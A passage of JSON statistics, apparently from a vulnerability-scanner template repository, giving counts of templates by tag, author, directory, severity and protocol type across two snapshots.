e":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":547},{"name":"panel","count":213},{"name":"xss","count":202},{"name":"wordpress","count":189},{"name":"rce","count":181},{"name":"exposure","count":180},{"name":"lfi","count":155},{"name":"cve2020","count":153},{"name":"wp-plugin","count":127},{"name":"tech","count":97},{"name":"config","count":90},{"name":"cve2021","count":88},{"name":"cve2019","count":84},{"name":"takeover","count":72},{"name":"cve2018","count":69},{"name":"","count":66},{"name":"token","count":64},{"name":"apache","count":62},{"name":"default-login","count":51},{"name":"cve2017","count":45},{"name":"file","count":44},{"name":"iot","count":44},{"name":"unauth","count":42},{"name":"network","count":35},{"name":"oob","count":35},{"name":"sqli","count":34},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"ssrf","count":28},{"name":"cve2016","count":27},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"disclosure","count":25},{"name":"listing","count":24},{"name":"redirect","count":21},{"name":"aem","count":19},{"name":"cisco","count":18},{"name":"sap","count":16},{"name":"cve2015","count":16},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"cve2014","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"auth-bypass","count":13},{"name":"misconfig","count":13},{"name":"android","count":13},{"name":"dns","count":12},{"name":"cve2011","count":12},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"jenkins","count":12},{"name":"springboot","count":11},{"name":"zoho","count":11},{"name":"devops","count":11},{"name":"dlink","count":11},{"name":"router","count":11},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"aws","count":8},{"name":"cnvd","count":8},{"name":"login","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"cve2009","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"vmware","count":7},{"name":"backup","count":6},{"name":"cms","count":6},{"name":"dell","count":6},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"iis","count":5},{"name":"fileupload","count":5},{"name":"dedecms","count":5},{"name":"django","count":5},{"name":"confluence","count":5},{"name":"java","count":5},{"name":"headless","count":5},{"name":"files","count":5},{"name":"netgear","count":5},{"name":"ibm","count":5},{"name":"phpmyadmin","count":5},{"name":"circarlife","count":5},{"name":"solr","count":5},{"name":"laravel","count":5},{"name":"drupal","count":5},{"name":"ruijie","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"crlf","count":4},{"name":"docker","count":4},{"name":"deserialization","count":4},{"name":"jolokia","count":4},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"webserver","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"moodle","count":4},{"name":"samsung","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"elastic","count":4},{"name":"tomcat","count":4},{"name":"amazon","count":3},{"name":"kubernetes","count":3},{"name":"windows","count":3},{"name":"terramaster","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"fanruan","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"printer","count":3},{"name":"openssh","count":3},{"name":"oa","count":3},{"name":"microstrategy","count":3},{"name":"targa","count":3},{"name":"zabbix","count":3},{"name":"hp","count":3},{"name":"zhiyuan","count":3},{"name":"kafka","count":3},{"name":"slack","count":3},{"name":"bypass","count":3},{"name":"ssh","count":3},{"name":"tikiwiki","count":3},{"name":"r-seenet","count":3},{"name":"ofbiz","count":3},{"name":"grafana","count":3},{"name":"git","count":3},{"name":"ebs","count":3},{"name":"cve2010","count":3},{"name":"log","count":3},{"name":"nacos","count":3},{"name":"caucho","count":3},{"name":"resin","count":3},{"name":"fpd","count":3},{"name":"vbulletin","count":3},{"name":"lfr","count":3},{"name":"itop","count":3},{"name":"nosqli","count":3},{"name":"wp-theme","count":2},{"name":"strapi","count":2},{"name":"voipmonitor","count":2},{"name":"hasura","count":2},{"name":"microsoft","count":2},{"name":"httpd","count":2},{"name":"idrac","count":2},{"name":"sonicwall","count":2},{"name":"plesk","count":2},{"name":"chiyu","count":2},{"name":"saltstack","count":2},{"name":"horde","count":2},{"name":"keycloak","count":2},{"name":"frp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"vrealize","count":2},{"name":"kentico","count":2},{"name":"status","count":2},{"name":"leak","count":2},{"name":"splunk","count":2},{"name":"dolibarr","count":2},{"name":"ucmdb","count":2},{"name":"xxljob","count":2},{"name":"natshell","count":2},{"name":"showdoc","count":2},{"name":"activemq","count":2},{"name":"oauth","count":2},{"name":"akkadian","count":2},{"name":"seeyon","count":2},{"name":"hjtcloud","count":2},{"name":"cache","count":2},{"name":"jboss","count":2},{"name":"hpe","count":2},{"name":"proxy","count":2},{"name":"phpcollab","count":2},{"name":"github","count":2},{"name":"yapi","count":2},{"name":"linkerd","count":2},{"name":"mail","count":2},{"name":"hashicorp","count":2},{"name":"cve2007","count":2},{"name":"jeedom","count":2},{"name":"paloalto","count":2},{"name":"nexus","count":2},{"name":"trixbox","count":2},{"name":"wordfence","count":2},{"name":"pega","count":2},{"name":"smtp","count":2},{"name":"kibana","count":2},{"name":"grav","count":2},{"name":"webcam","count":2},{"name":"fortios","count":2},{"name":"sonarqube","count":2},{"name":"spark","count":2},{"name":"dos","count":2},{"name":"shellshock","count":2},{"name":"intrusive","count":2},{"name":"mida","count":2},{"name":"wso2","count":2},{"name":"odoo","count":2},{"name":"rstudio","count":2},{"name":"bigip","count":2},{"name":"huawei","count":2},{"name":"akamai","count":2},{"name":"igs","count":2},{"name":"service","count":2},{"name":"jsf","count":2},{"name":"glassfish","count":2},{"name":"rockmongo","count":2},{"name":"kevinlab","count":2},{"name":"openam","count":2},{"name":"cve2008","count":2},{"name":"couchdb","count":2},{"name":"injection","count":2},{"name":"flir","count":2},{"name":"sharepoint","count":2},{"name":"telerik","count":2},{"name":"nextjs","count":2},{"name":"globalprotect","count":2},{"name":"jellyfin","count":2},{"name":"smb","count":2},{"name":"openfire","count":2},{"name":"icewarp","count":2},{"name":"rockethchat","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"waf","count":2},{"name":"ecology","count":2},{"name":"prometheus","count":2},{"name":"cacti","count":1},{"name":"servicedesk","count":1},{"name":"pippoint","count":1},{"name":"vnc","count":1},{"name":"csod","count":1},{"name":"jsp","count":1},{"name":"ambari","count":1},{"name":"adminer","count":1},{"name":"nsasg","count":1},{"name":"redcap","count":1},{"name":"robomongo","count":1},{"name":"yealink","count":1},{"name":"phpunit","count":1},{"name":"openemr","count":1},{"name":"xml","count":1},{"name":"beanshell","count":1},{"name":"firebase","count":1},{"name":"timeclock","count":1},{"name":"gloo","count":1},{"name":"calendarix","count":1},{"name":"opencast","count":1},{"name":"fortilogger","count":1},{"name":"xiuno","count":1},{"name":"monitorr","count":1},{"name":"harbor","count":1},{"name":"drone","count":1},{"name":"zenario","count":1},{"name":"avalanche","count":1},{"name":"fortinet","count":1},{"name":"openx","count":1},{"name":"szhe","count":1},{"name":"froxlor","count":1},{"name":"concrete","count":1},{"name":"turbocrm","count":1},{"name":"kong","count":1},{"name":"sidekiq","count":1},{"name":"jeewms","count":1},{"name":"zm","count":1},{"name":"fastcgi","count":1},{"name":"clockwatch","count":1},{"name":"blind","count":1},{"name":"xff","count":1},{"name":"centreon","count":1},{"name":"flash","count":1},{"name":"cobub","count":1},{"name":"alertmanager","count":1},{"name":"phalcon","count":1},{"name":"flink","count":1},{"name":"powercreator","count":1},{"name":"visionhub","count":1},{"name":"gitlist","count":1},{"name":"tpshop","count":1},{"name":"geddy","count":1},{"name":"extractor","count":1},{"name":"octoprint","count":1},{"name":"traefik","count":1},{"name":"klog","count":1},{"name":"thinkadmin","count":1},{"name":"saltapi","count":1},{"name":"razor","count":1},{"name":"starttls","count":1},{"name":"hadoop","count":1},{"name":"sentry","count":1},{"name":"mongoshake","count":1},{"name":"crm","count":1},{"name":"metinfo","count":1},{"name":"netdata","count":1},{"name":"etouch","count":1},{"name":"mailchimp","count":1},{"name":"svnserve","count":1},{"name":"arl","count":1},{"name":"smartsense","count":1},{"name":"openrestry","count":1},{"name":"ns","count":1},{"name":"payara","count":1},{"name":"lotuscms","count":1},{"name":"wondercms","count":1},{"name":"xdcms","count":1},{"name":"grails","count":1},{"name":"druid","count":1},{"name":"74cms","count":1},{"name":"api-manager","count":1},{"name":"realteo","count":1},{"name":"nordex","count":1},{"name":"tamronos","count":1},{"name":"tensorboard","count":1},{"name":"kafdrop","count":1},{"name":"bash","count":1},{"name":"javascript","count":1},{"name":"netis","count":1},{"name":"ecom","count":1},{"name":"clink-office","count":1},{"name":"cse","count":1},{"name":"xvr","count":1},{"name":"rmc","count":1},{"name":"fastapi","count":1},{"name":"wing-ftp","count":1},{"name":"ec2","count":1},{"name":"csrf","count":1},{"name":"spip","count":1},{"name":"postmessage","count":1},{"name":"bitly","count":1},{"name":"eyou","count":1},{"name":"finereport","count":1},{"name":"zookeeper","count":1},{"name":"solman","count":1},{"name":"fortigate","count":1},{"name":"webadmin","count":1},{"name":"checkpoint","count":1},{"name":"xunchi","count":1},{"name":"landray","count":1},{"name":"gespage","count":1},{"name":"sureline","count":1},{"name":"zimbra","count":1},{"name":"vscode","count":1},{"name":"jfrog","count":1},{"name":"doh","count":1},{"name":"cors","count":1},{"name":"node","count":1},{"name":"cve2005","count":1},{"name":"htmli","count":1},{"name":"wamp","count":1},{"name":"zte","count":1},{"name":"sprintful","count":1},{"name":"ueditor","count":1},{"name":"kubeflow","count":1},{"name":"redis","count":1},{"name":"hiboss","count":1},{"name":"b2evolution","count":1},{"name":"npm","count":1},{"name":"wazuh","count":1},{"name":"rmi","count":1},{"name":"mongo","count":1},{"name":"sceditor","count":1},{"name":"javafaces","count":1},{"name":"default","count":1},{"name":"trilithic","count":1},{"name":"ricoh","count":1},{"name":"alibaba","count":1},{"name":"geutebruck","count":1},{"name":"chinaunicom","count":1},{"name":"totaljs","count":1},{"name":"clusterengine","count":1},{"name":"mariadb","count":1},{"name":"embedthis","count":1},{"name":"guacamole","count":1},{"name":"enumeration","count":1},{"name":"email","count":1},{"name":"pulsesecure","count":1},{"name":"portainer","count":1},{"name":"spf","count":1},{"name":"apos","count":1},{"name":"apiman","count":1},{"name":"ems","count":1},{"name":"blackboard","count":1},{"name":"centos","count":1},{"name":"kerbynet","count":1},{"name":"zeroshell","count":1},{"name":"hortonworks","count":1},{"name":"aura","count":1},{"name":"webmodule-ee","count":1},{"name":"parentlink","count":1},{"name":"k8","count":1},{"name":"kyan","count":1},{"name":"tenda","count":1},{"name":"subrion","count":1},{"name":"vsftpd","count":1},{"name":"opm","count":1},{"name":"webui","count":1},{"name":"fedora","count":1},{"name":"auth","count":1},{"name":"anchorcms","count":1},{"name":"eprints","count":1},{"name":"rabbitmq","count":1},{"name":"sourcebans","count":1},{"name":"jenzabar","count":1},{"name":"monitorix","count":1},{"name":"ganglia","count":1},{"name":"optiLink","count":1},{"name":"tileserver","count":1},{"name":"cgi","count":1},{"name":"ulterius","count":1},{"name":"addpac","count":1},{"name":"panos","count":1},{"name":"haproxy","count":1},{"name":"nexusdb","count":1},{"name":"jitsi","count":1},{"name":"vsphere","count":1},{"name":"lanproxy","count":1},{"name":"manageengine","count":1},{"name":"bolt","count":1},{"name":"wooyun","count":1},{"name":"phpinfo","count":1},{"name":"camunda","count":1},{"name":"wavemaker","count":1},{"name":"javamelody","count":1},{"name":"ruby","count":1},{"name":"keenetic","count":1},{"name":"acme","count":1},{"name":"upnp","count":1},{"name":"octobercms","count":1},{"name":"acontent","count":1},{"name":"episerver","count":1},{"name":"zyxel","count":1},{"name":"mantis","count":1},{"name":"wmt","count":1},{"name":"shopxo","count":1},{"name":"landrayoa","count":1},{"name":"influxdb","count":1},{"name":"plugin","count":1},{"name":"interlib","count":1},{"name":"tapestry","count":1},{"name":"webmin","count":1},{"name":"wildfly","count":1},{"name":"tensorflow","count":1},{"name":"emc","count":1},{"name":"lutron","count":1},{"name":"socomec","count":1},{"name":"majordomo2","count":1},{"name":"h3c-imc","count":1},{"name":"ruckus","count":1},{"name":"heroku","count":1},{"name":"nomad","count":1},{"name":"ioncube","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"zmanda","count":1},{"name":"sage","count":1},{"name":"bigbluebutton","count":1},{"name":"seacms","count":1},{"name":"visualtools","count":1},{"name":"azure","count":1},{"name":"opensns","count":1},{"name":"nc2","count":1},{"name":"scs","count":1},{"name":"circontrol","count":1},{"name":"plc","count":1},{"name":"dom","count":1},{"name":"jmx","count":1},{"name":"xmlchart","count":1},{"name":"yachtcontrol","count":1},{"name":"axis","count":1},{"name":"biometrics","count":1},{"name":"lansweeper","count":1},{"name":"fortiweb","count":1},{"name":"dompdf","count":1},{"name":"cloudinary","count":1},{"name":"expose","count":1},{"name":"bedita","count":1},{"name":"rsyncd","count":1},{"name":"plastic","count":1},{"name":"discord","count":1},{"name":"memcached","count":1},{"name":"panabit","count":1},{"name":"expn","count":1},{"name":"st","count":1},{"name":"woocomernce","count":1},{"name":"nuuo","count":1},{"name":"zcms","count":1},{"name":"netrc","count":1},{"name":"bookstack","count":1},{"name":"triconsole","count":1},{"name":"lg-nas","count":1},{"name":"fortigates","count":1},{"name":"sgp","count":1},{"name":"domxss","count":1},{"name":"qvisdvr","count":1},{"name":"glances","count":1},{"name":"livezilla","count":1},{"name":"redhat","count":1},{"name":"viewlinc","count":1},{"name":"magicflow","count":1},{"name":"tika","count":1},{"name":"pyramid","count":1},{"name":"ssltls","count":1},{"name":" default-login","count":1},{"name":"sco","count":1},{"name":"acexy","count":1},{"name":"maccmsv10","count":1},{"name":"ilo4","count":1},{"name":"liferay","count":1},{"name":"nette","count":1},{"name":"weiphp","count":1},{"name":"redwood","count":1},{"name":"stem","count":1},{"name":"ntopng","count":1},{"name":"appweb","count":1},{"name":"cerebro","count":1},{"name":"mcafee","count":1},{"name":"dotnet","count":1},{"name":"dvwa","count":1},{"name":"cocoon","count":1},{"name":"jnoj","count":1},{"name":"sqlite","count":1},{"name":"pacsone","count":1},{"name":"rujjie","count":1},{"name":"twitter-server","count":1},{"name":"ssl","count":1},{"name":"wavlink","count":1},{"name":"opentsdb","count":1},{"name":"spring","count":1},{"name":"bullwark","count":1},{"name":"linkedin","count":1},{"name":"salesforce","count":1},{"name":"goahead","count":1},{"name":"mysql","count":1},{"name":"jenkin","count":1},{"name":"iptime","count":1},{"name":"diris","count":1},{"name":"oscommerce","count":1},{"name":"scimono","count":1},{"name":"spectracom","count":1},{"name":"swagger","count":1},{"name":"floc","count":1},{"name":"enum","count":1},{"name":"idemia","count":1},{"name":"timesheet","count":1},{"name":"gateone","count":1},{"name":"uwsgi","count":1},{"name":"clave","count":1},{"name":"faraday","count":1},{"name":"mirai","count":1},{"name":"plone","count":1},{"name":"favicon","count":1},{"name":"skywalking","count":1},{"name":"netsweeper","count":1},{"name":"rubedo","count":1},{"name":"soar","count":1},{"name":"sitecore","count":1},{"name":"avtech","count":1},{"name":"varnish","count":1},{"name":"qcubed","count":1},{"name":"rfi","count":1},{"name":"linksys","count":1},{"name":"exposures","count":1},{"name":"viewpoint","count":1},{"name":"chevereto","count":1},{"name":"upload","count":1},{"name":"svn","count":1},{"name":"gridx","count":1},{"name":"duomicms","count":1},{"name":"exchange","count":1},{"name":"mantisbt","count":1},{"name":"db","count":1},{"name":"rhymix","count":1},{"name":"esmtp","count":1},{"name":"aspnuke","count":1},{"name":"sarg","count":1},{"name":"comodo","count":1},{"name":"codemeter","count":1},{"name":"synnefo","count":1},{"name":"primetek","count":1},{"name":"springframework","count":1},{"name":"dnssec","count":1},{"name":"myucms","count":1},{"name":"dvr","count":1},{"name":"aruba","count":1},{"name":"setup","count":1},{"name":"zzzcms","count":1},{"name":"symfony","count":1},{"name":"gogs","count":1},{"name":"mdb","count":1},{"name":"erp-nc","count":1},{"name":"accela","count":1},{"name":"commscope","count":1},{"name":"gotmls","count":1},{"name":"zarafa","count":1},{"name":"opensmtpd","count":1},{"name":"alerta","count":1},{"name":"ghost","count":1},{"name":"zend","count":1},{"name":"moin","count":1},{"name":"yii","count":1},{"name":"postgres","count":1},{"name":"mpsec","count":1},{"name":"codeigniter","count":1},{"name":"wuzhicms","count":1},{"name":"openerp","count":1},{"name":"node-red-dashboard","count":1},{"name":"nuxeo","count":1},{"name":"circontrorl","count":1},{"name":"resourcespace","count":1},{"name":"cloudflare","count":1},{"name":"moinmoin","count":1},{"name":"getsimple","count":1},{"name":"expressjs","count":1},{"name":"servicenow","count":1},{"name":"spidercontrol","count":1},{"name":"huijietong","count":1},{"name":"k8s","count":1},{"name":"mautic","count":1},{"name":"nps","count":1},{"name":"wifisky","count":1},{"name":"glpi","count":1},{"name":"achecker","count":1},{"name":"feifeicms","count":1},{"name":"discourse","count":1},{"name":"bruteforce","count":1},{"name":"pgadmin","count":1},{"name":"backdoor","count":1},{"name":"dotclear","count":1},{"name":"mediumish","count":1},{"name":"openstack","count":1},{"name":"lancom","count":1},{"name":"blue-ocean","count":1},{"name":"lighttpd","count":1},{"name":"emby","count":1},{"name":"labtech","count":1},{"name":"fiori","count":1},{"name":"jquery","count":1},{"name":"dotnetnuke","count":1},{"name":"krweb","count":1},{"name":"shopware","count":1},{"name":"nedi","count":1},{"name":"phpfusion","count":1},{"name":"fuelcms","count":1},{"name":"mara","count":1},{"name":"wiki","count":1},{"name":"tongda","count":1},{"name":"empirecms","count":1},{"name":"darkstat","count":1},{"name":"selea","count":1},{"name":"2014","count":1},{"name":"mobileiron","count":1},{"name":"rdp","count":1},{"name":"webftp","count":1},{"name":"proftpd","count":1},{"name":"exacqvision","count":1}],"authors":[{"name":"dhiyaneshdk","count":232},{"name":"pikpikcu","count":225},{"name":"pdteam","count":189},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":122},{"name":"daffainfo","count":114},{"name":"madrobot","count":60},{"name":"gy741","count":54},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":36},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"philippedelteil","count":16},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"wdahlenb","count":9},{"name":"nadino","count":8},{"name":"r3dg33k","count":8},{"name":"melbadry9","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"pentest_swissky","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"meme-lord","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"fyoorer","count":3},{"name":"yash anand 